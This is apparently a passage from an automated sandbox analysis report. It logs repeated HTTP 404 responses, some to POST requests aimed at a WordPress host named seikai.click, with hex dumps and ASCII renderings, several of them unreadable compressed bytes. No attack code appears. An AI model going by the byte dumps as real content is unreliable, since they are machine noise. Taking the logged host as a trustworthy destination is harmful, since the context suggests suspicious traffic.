3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 07 Nov 2024 09:11:16 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8wpo-cache-status: not cachedwpo-cache-message: The request method was not GET (POST)link: <http://seikai.click/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 07 Nov 2024 09:11:53 GMTserver: LiteSpeedData Raw: 34 62 62 65 0d 0a d4 03 17 8a 0c 98 b4 da 1f 12 51 55 fb 61 65 06 60 4d ea 01 50 b5 48 c8 bc 60 f5 c7 af 3f ff fc f7 97 81 b1 3b 20 96 ed b8 9e ef 3f 33 b5 fe 1c 55 e5 70 7f 46 b7 2d d2 01 41 90 94 64 9b 0a 9d ec bd ec 71 92 fe 3d b6 2b 05 93 8f 14 6c 10 e0 00 d0 16 85 55 df f6 5f b7 e5 76 d0 6c ff ab 5a 56 cf 34 d5 7f a6 83 b0 0b 70 f1 11 98 e4 9c f7 5c 65 90 00 29 78 48 82 07 92 23 ca 7a 72 aa 2e b5 57 c7 fc fa d4 15 8e 9d 2f 55 fd af fe d7 54 37 6c 5c 79 86 00 18 1b 36 dd 4d 9f bb 90 aa ab 4c 40 21 3e 2a db 0a 99 56 a6 24 9b b2 4d 25 bb 2b 96 00 c8 ff 6b ce ff 35 6c 56 f7 cf 2f e4 15 41 46 4d 3a bf d7 5d 27 71 a2 a4 80 47 f9 a5 0b a6 56 4c 37 a5 96 dd 62 1c 66 bc 54 2d 6b aa a9 f6 f7 03 80 21 8e 47 d9 59 7c 7c 88 79 45 2c 25 78 c0 60 00 d2 44 3a a4 e9 73 d3 b9 77 57 7b fe 68 f9 da c7 7f 88 70 e9 1d 20 91 a5 e8 2f ed a2 4b 2c a0 88 22 fb a8 42 83 79 01 c8 96 c0 53 00 4f d2 0f 92 65 20 59 02 4e d5 d5 61 e6 cd 7b 92 9f 25 7b 95 6c 7f 39 6e 48 92 2d 67 f9 92 bc de 1f b2 bd 97 d9 ed 11 14 37 84 4c 2f a0 0c 98 2e bf 65 0b 3f 3c 00 3f 40 f0 fe 4f 67 d9 07 bb 14 4d ba e6 d8 87 d0 a5 bc 2e 57 86 66 46 7a 2f 63 ef 16 58 78 83 3e 00 ce 97 f4 f5 ed b3 66 47 8b f2 91 75 ec a0 15 dc 09 2b 00 f4 fa 54 15 2a 88 5d 09 58 6e ba 2d da 3c 86 6a 76 bf 51 44 e4 d9 ac f1 3c 86 6a b3 f3 b2 ee 26 88 88 0f 10 d3 63 43 66 a5 57 ab 6b 06 d2 84 f5 21 e4 de c6 d0 ea be 17 1b 02 62 d9 9c 4c dc c7 30 ab e9 7e ff f5 3a 09 a2 22 a2 41 05 63 63 34 ca bd fb 0e c0 42 62 d0 d6 14 9c 7a 1d 32 36 a2 01 f5 d1 68 87 97 f8 38 01 13 8f 07 f7 67 be 55 a3 57 5d 5a 90 4b 71 05 07 bb 9b c5 3d cb 99 b0 0e 7d 41 aa bd 76 50 01 cc 29 19 82 0b 9f 42 bd a6 c8 b7 89 c2 59 de 77 88 5c 29 14 16 09 2c 79 bf c7 d0 9a 0b e3 dd f0 71 ce 50 9b f9 ef 77 52 e8 b4 6d fc 10 e2 e3 c1 e0 ce 19 ee e5 3c 16 5f 64 27 3d 82 74 60 3a 2f 5b f9 16 2b 58 4a 3f 9b c2 e3 55 be 31 c2 79 38 79 f6 05 f4 fb f6 22 c1 22 cd d8 21 44 30 f3 be 73 79 1c af 8d 70 7e 01 00 ae b0 34 b6 ea 2c 3a 17 47 df d3 c5 0e 4d 0c 51 54 52 bb c6 96 55 a6 14 0a 8b 7b 9b 4b f1 e6 e3 2f 09 63 27 51 29 fe 8f b7 ed ed 6f 6d 6f ff 67 7b f3 1f db eb 9f f9 c1 9f fd f4 f6 fa 4f b6 d7 3f bd bd f9 a9 ed f5 ff 6d af 7f 7b 7b f3 cb db eb 3f df 5e ff fa f6 fa f7 21 82 ef fd ca ff 7f ff 57 7f e6 fb bf ff a7 df bb fe d7 5c 9c 95 ea 4a 5c 72 dd 10 ac 04 7e dd 61 41 18 63 a2 aa ee 5d 3a a3 79 05 a8 b3 5b Data Ascii: 4bbeQUae`MPH`?; ?3UpF-Adq=+lU_vlZV4p\e)xH#zr.W/UT7l\y6ML@!>*V$M%+k
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8wpo-cache-status: not cachedwpo-cache-message: The request method was not GET (POST)link: <http://seikai.click/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 07 Nov 2024 09:11:55 GMTserver: LiteSpeedData Raw: 34 62 62 65 0d 0a d4 03 17 8a 0c 98 b4 da 1f 12 51 55 fb 61 65 06 60 4d ea 01 50 b5 48 c8 bc 60 f5 c7 af 3f ff fc f7 97 81 b1 3b 20 96 ed b8 9e ef 3f 33 b5 fe 1c 55 e5 70 7f 46 b7 2d d2 01 41 90 94 64 9b 0a 9d ec bd ec 71 92 fe 3d b6 2b 05 93 8f 14 6c 10 e0 00 d0 16 85 55 df f6 5f b7 e5 76 d0 6c ff ab 5a 56 cf 34 d5 7f a6 83 b0 0b 70 f1 11 98 e4 9c f7 5c 65 90 00 29 78 48 82 07 92 23 ca 7a 72 aa 2e b5 57 c7 fc fa d4 15 8e 9d 2f 55 fd af fe d7 54 37 6c 5c 79 86 00 18 1b 36 dd 4d 9f bb 90 aa ab 4c 40 21 3e 2a db 0a 99 56 a6 24 9b b2 4d 25 bb 2b 96 00 c8 ff 6b ce ff 35 6c 56 f7 cf 2f e4 15 41 46 4d 3a bf d7 5d 27 71 a2 a4 80 47 f9 a5 0b a6 56 4c 37 a5 96 dd 62 1c 66 bc 54 2d 6b aa a9 f6 f7 03 80 21 8e 47 d9 59 7c 7c 88 79 45 2c 25 78 c0 60 00 d2 44 3a a4 e9 73 d3 b9 77 57 7b fe 68 f9 da c7 7f 88 70 e9 1d 20 91 a5 e8 2f ed a2 4b 2c a0 88 22 fb a8 42 83 79 01 c8 96 c0 53 00 4f d2 0f 92 65 20 59 02 4e d5 d5 61 e6 cd 7b 92 9f 25 7b 95 6c 7f 39 6e 48 92 2d 67 f9 92 bc de 1f b2 bd 97 d9 ed 11 14 37 84 4c 2f a0 0c 98 2e bf 65 0b 3f 3c 00 3f 40 f0 fe 4f 67 d9 07 bb 14 4d ba e6 d8 87 d0 a5 bc 2e 57 86 66 46 7a 2f 63 ef 16 58 78 83 3e 00 ce 97 f4 f5 ed b3 66 47 8b f2 91 75 ec a0 15 dc 09 2b 00 f4 fa 54 15 2a 88 5d 09 58 6e ba 2d da 3c 86 6a 76 bf 51 44 e4 d9 ac f1 3c 86 6a b3 f3 b2 ee 26 88 88 0f 10 d3 63 43 66 a5 57 ab 6b 06 d2 84 f5 21 e4 de c6 d0 ea be 17 1b 02 62 d9 9c 4c dc c7 30 ab e9 7e ff f5 3a 09 a2 22 a2 41 05 63 63 34 ca bd fb 0e c0 42 62 d0 d6 14 9c 7a 1d 32 36 a2 01 f5 d1 68 87 97 f8 38 01 13 8f 07 f7 67 be 55 a3 57 5d 5a 90 4b 71 05 07 bb 9b c5 3d cb 99 b0 0e 7d 41 aa bd 76 50 01 cc 29 19 82 0b 9f 42 bd a6 c8 b7 89 c2 59 de 77 88 5c 29 14 16 09 2c 79 bf c7 d0 9a 0b e3 dd f0 71 ce 50 9b f9 ef 77 52 e8 b4 6d fc 10 e2 e3 c1 e0 ce 19 ee e5 3c 16 5f 64 27 3d 82 74 60 3a 2f 5b f9 16 2b 58 4a 3f 9b c2 e3 55 be 31 c2 79 38 79 f6 05 f4 fb f6 22 c1 22 cd d8 21 44 30 f3 be 73 79 1c af 8d 70 7e 01 00 ae b0 34 b6 ea 2c 3a 17 47 df d3 c5 0e 4d 0c 51 54 52 bb c6 96 55 a6 14 0a 8b 7b 9b 4b f1 e6 e3 2f 09 63 27 51 29 fe 8f b7 ed ed 6f 6d 6f ff 67 7b f3 1f db eb 9f f9 c1 9f fd f4 f6 fa 4f b6 d7 3f bd bd f9 a9 ed f5 ff 6d af 7f 7b 7b f3 cb db eb 3f df 5e ff fa f6 fa f7 21 82 ef fd ca ff 7f ff 57 7f e6 fb bf ff a7 df bb fe d7 5c 9c 95 ea 4a 5c 72 dd 10 ac 04 7e dd 61 41 18 63 a2 aa ee 5d 3a a3 79 05 a8 b3 5b Data Ascii: 4bbeQUae`MPH`?; ?3UpF-Adq=+lU_vlZV4p\e)xH#zr.W/UT7l\y6ML@!>*V$M%+k
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8wpo-cache-status: not cachedwpo-cache-message: The request method was not GET (POST)link: <http://seikai.click/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 07 Nov 2024 09:11:58 GMTserver: LiteSpeedData Raw: 34 62 62 65 0d 0a d4 03 17 8a 0c 98 b4 da 1f 12 51 55 fb 61 65 06 60 4d ea 01 50 b5 48 c8 bc 60 f5 c7 af 3f ff fc f7 97 81 b1 3b 20 96 ed b8 9e ef 3f 33 b5 fe 1c 55 e5 70 7f 46 b7 2d d2 01 41 90 94 64 9b 0a 9d ec bd ec 71 92 fe 3d b6 2b 05 93 8f 14 6c 10 e0 00 d0 16 85 55 df f6 5f b7 e5 76 d0 6c ff ab 5a 56 cf 34 d5 7f a6 83 b0 0b 70 f1 11 98 e4 9c f7 5c 65 90 00 29 78 48 82 07 92 23 ca 7a 72 aa 2e b5 57 c7 fc fa d4 15 8e 9d 2f 55 fd af fe d7 54 37 6c 5c 79 86 00 18 1b 36 dd 4d 9f bb 90 aa ab 4c 40 21 3e 2a db 0a 99 56 a6 24 9b b2 4d 25 bb 2b 96 00 c8 ff 6b ce ff 35 6c 56 f7 cf 2f e4 15 41 46 4d 3a bf d7 5d 27 71 a2 a4 80 47 f9 a5 0b a6 56 4c 37 a5 96 dd 62 1c 66 bc 54 2d 6b aa a9 f6 f7 03 80 21 8e 47 d9 59 7c 7c 88 79 45 2c 25 78 c0 60 00 d2 44 3a a4 e9 73 d3 b9 77 57 7b fe 68 f9 da c7 7f 88 70 e9 1d 20 91 a5 e8 2f ed a2 4b 2c a0 88 22 fb a8 42 83 79 01 c8 96 c0 53 00 4f d2 0f 92 65 20 59 02 4e d5 d5 61 e6 cd 7b 92 9f 25 7b 95 6c 7f 39 6e 48 92 2d 67 f9 92 bc de 1f b2 bd 97 d9 ed 11 14 37 84 4c 2f a0 0c 98 2e bf 65 0b 3f 3c 00 3f 40 f0 fe 4f 67 d9 07 bb 14 4d ba e6 d8 87 d0 a5 bc 2e 57 86 66 46 7a 2f 63 ef 16 58 78 83 3e 00 ce 97 f4 f5 ed b3 66 47 8b f2 91 75 ec a0 15 dc 09 2b 00 f4 fa 54 15 2a 88 5d 09 58 6e ba 2d da 3c 86 6a 76 bf 51 44 e4 d9 ac f1 3c 86 6a b3 f3 b2 ee 26 88 88 0f 10 d3 63 43 66 a5 57 ab 6b 06 d2 84 f5 21 e4 de c6 d0 ea be 17 1b 02 62 d9 9c 4c dc c7 30 ab e9 7e ff f5 3a 09 a2 22 a2 41 05 63 63 34 ca bd fb 0e c0 42 62 d0 d6 14 9c 7a 1d 32 36 a2 01 f5 d1 68 87 97 f8 38 01 13 8f 07 f7 67 be 55 a3 57 5d 5a 90 4b 71 05 07 bb 9b c5 3d cb 99 b0 0e 7d 41 aa bd 76 50 01 cc 29 19 82 0b 9f 42 bd a6 c8 b7 89 c2 59 de 77 88 5c 29 14 16 09 2c 79 bf c7 d0 9a 0b e3 dd f0 71 ce 50 9b f9 ef 77 52 e8 b4 6d fc 10 e2 e3 c1 e0 ce 19 ee e5 3c 16 5f 64 27 3d 82 74 60 3a 2f 5b f9 16 2b 58 4a 3f 9b c2 e3 55 be 31 c2 79 38 79 f6 05 f4 fb f6 22 c1 22 cd d8 21 44 30 f3 be 73 79 1c af 8d 70 7e 01 00 ae b0 34 b6 ea 2c 3a 17 47 df d3 c5 0e 4d 0c 51 54 52 bb c6 96 55 a6 14 0a 8b 7b 9b 4b f1 e6 e3 2f 09 63 27 51 29 fe 8f b7 ed ed 6f 6d 6f ff 67 7b f3 1f db eb 9f f9 c1 9f fd f4 f6 fa 4f b6 d7 3f bd bd f9 a9 ed f5 ff 6d af 7f 7b 7b f3 cb db eb 3f df 5e ff fa f6 fa f7 21 82 ef fd ca ff 7f ff 57 7f e6 fb bf ff a7 df bb fe d7 5c 9c 95 ea 4a 5c 72 dd 10 ac 04 7e dd 61 41 18 63 a2 aa ee 5d 3a a3 79 05 a8 b3 5b Data Ascii: 4bbeQUae`MPH`?; ?3UpF-Adq=+lU_vlZV4p\e)xH#zr.W/UT7l\y6ML@!>*V$M%+k
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 09:12:07 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 09:12:09 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 09:12:12 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 09:12:14 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the 